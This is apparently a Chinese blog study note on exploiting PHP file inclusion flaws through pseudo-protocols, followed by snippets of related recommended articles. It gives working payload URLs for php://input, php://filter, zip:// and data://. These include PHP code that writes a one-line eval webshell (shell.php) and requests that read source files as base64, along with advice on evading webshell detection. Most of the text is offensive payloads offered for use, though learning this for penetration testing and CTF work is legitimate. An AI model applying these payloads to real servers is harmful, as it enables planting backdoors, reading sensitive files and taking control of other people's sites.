文件包含之伪协议的使用

最新推荐文章于 2024-05-14 21:12:14 发布
最新推荐文章于 2024-05-14 21:12:14 发布
阅读量638 收藏 1
点赞数
分类专栏: 网络安全 笔记 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56438857/article/details/126052271
版权

目录

文件包含漏洞利用实例

1. php流的input

http://127.0.0.1/include/03/index.php?page=php://input

然后要用post类型提交数据

这里可以这么提交:

<?php 
fputs(fopen("shell.php","w"),"<?php @eval(\$_POST["hack"])?>")
?>

这里通过直接写入一个木马文件,来进行攻击。

所以不只是文件上传点可以写入木马,php的input流也可以写入一句话木马。

2. php流的filter协议

?page=php://filter/read=convert.base64-encode/resource=index.php

?page=php://filter/convert.base64-encode/resource=index.php

通过指定末尾的文件,可以读取经base64编码后的文件源码,之后再base64解码一下就行。

虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。

allow_url_include和allow_url fopen都不做要求,这是非常大的优势。

3. zip压缩流

?page=zip://C:/Users/40454/Desktop/test.jpg%23test.txt

先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。、

注意,这里必须是绝对路径

4. data协议

?file=data://text/plain,<?php phpinfo();?>

但在利用时有很多问题。

后面php代码容易被查杀,所以要灵活利用编码等方法,可以借鉴webshell免杀,原理都是一样的。

<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。

解决思路:

不写后面的 ?> 因为PHP里面其实不需要写后面的 前面的 ;号就已经说明结束了。

如果没有;号就必须写 ?>作为结束。

一青一柠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php审计--通过php伪协议配合文件包含写入shell
qq_29437513的博客
08-13 700
有群友问过这样一个问题,, http:xxx/123.jpg 传上这样的图片马能不能连到shell? 这有几种情况,,,php解析吧jpg解析成php,iis吧jpg解析成php都可以 我们这里通过php伪协议+存在文件包含的页面做个复现 先写个include函数,include后面没做处理的 <?php $file = $_GET['a']; include "$file"; to 然后,,如果目录阶乘符不能用,url编码后无法绕过,尝试file协议 在我本地环境www目录下存在一个无类型的a
文件包含漏洞& 文件伪协议利用
cike_y
09-11 1656
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
文件包含时涉及PHP伪协议总结
最新发布
qq_43256965的博客
05-14 1084
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
文件包含伪协议的利用
E1even的博客
06-22 1792
文件包含一直没有整理知识,今天就用这篇文章梳理一下解题吧 伪协议: 首先说一下:./ 与…/的区别: ./是:当前目录 …/是父级目录 fillter、file用来读取文件源码: filter协议用于读取源码居多,读取路径是相对路径,较为轻松。一般拿来读取index.php源码 ?file=php://filter/read=convert.base64-encode/resource=./flag.php 这里说一下,php这里可以大写 例如: 使用filter读取源码,方便我们下一步 说说file协
php伪协议c,文件包含之:php伪协议
weixin_34649372的博客
03-27 199
file://协议条件:allow_url_fopen:off/onallow_url_include:off/on作用:用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,...
j7ur8#WebBook#伪协议文件包含1
07-25
伪协议参考利用条件filter的过滤器有很多。
文件下载包伪代码,可以解决部分问题
07-21
综上所述,“文件下载包伪代码”涉及的主要是Web前端如何实现文件下载,包括各种API的使用、浏览器兼容性处理以及应对各种场景的策略。通过理解这些知识点,开发者可以更有效地实现在Web应用中进行文件下载的功能。
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
什么是php伪协议,并举例说明
02-25
1. 伪协议的安全性:确保在使用自定义伪协议时,正确处理潜在的安全风险,如输入验证和权限控制。 2. 性能优化:虽然伪协议提供了便利,但过度使用可能会影响程序性能,尤其是在处理大量数据时。 3. 文档和兼容性:...
信息安全技术:PHP伪协议.pptx
11-01
PHAR文件可以包含整个项目,便于分发和部署,但应确保对PHAR的签名验证以防止恶意代码注入。 8. rar:// - RAR `rar://`协议允许PHP脚本直接操作RAR文件,但这通常不是PHP的标准特性,需要额外的扩展支持。 9. ...
[Web基础/文件包含]文件包含入门/伪协议/日志包含
車鈊的博客
07-11 419
文件包含(授课文档) 文章目录文件包含(授课文档)本节包含关联知识什么是文件包含?前置知识形式上讲分为为什么学这个利用方法什么是读?什么是写?伪协议配置文件常用伪协议1.file://2.http://3.php://filter4.php://input5.data://利用文件包含getshell你可能会遇到的过滤:文件包含之日志包含后续 本节包含 文件包含原理与使用 伪协议和一句话木马 日志包含 关联知识 文件上传(本地包含) 利用伪协议包含一句话木马 base64编码 什么是文件包含? RC
伪协议配合回调函数写入命令
wikey 的博客
04-01 250
然后payload: GET v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64- decode/resource=1.php POST v1=hex2bin 最后访问1.php。//用来写文件进去,其中文件名参数是支持伪协议的,用于将第二个参数content进行过滤器后再写进文件里面去。v3得是一个文件把,写入一些命令执行的东西,那我们可以通过伪协议直接生成文件。当然这道题可以学到很多东西,首先我们先分析一下。
文件包含漏洞】——文件包含漏洞进阶_PHP伪协议
weixin_45588247的博客
08-05 1728
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
PHP伪协议详解
windowshht的博客
03-16 559
PHP伪协议是一种方便的工具,可以用于读取和写入文件,以及对数据流进行过滤。使用PHP伪协议时,应注意安全性问题。不要使用PHP伪协议来执行远程文件,除非您确定该文件是安全的。使用PHP伪协议来读取远程文件时,应使用过滤器来对数据进行验证。*使用PHP伪协议来写入文件时,应确保文件具有适当的访问权限。
PHP伪协议总结
weixin_52385170的博客
01-15 595
php伪协议 封装协议 内置协议
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3133
渗透测试-文件包含漏洞以及php伪协议的应用
getshell思路
Bu2n的博客
02-23 5709
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
php伪协议
weixin_60719780的博客
01-27 4494
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
文件包含-伪协议filter
08-22
通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值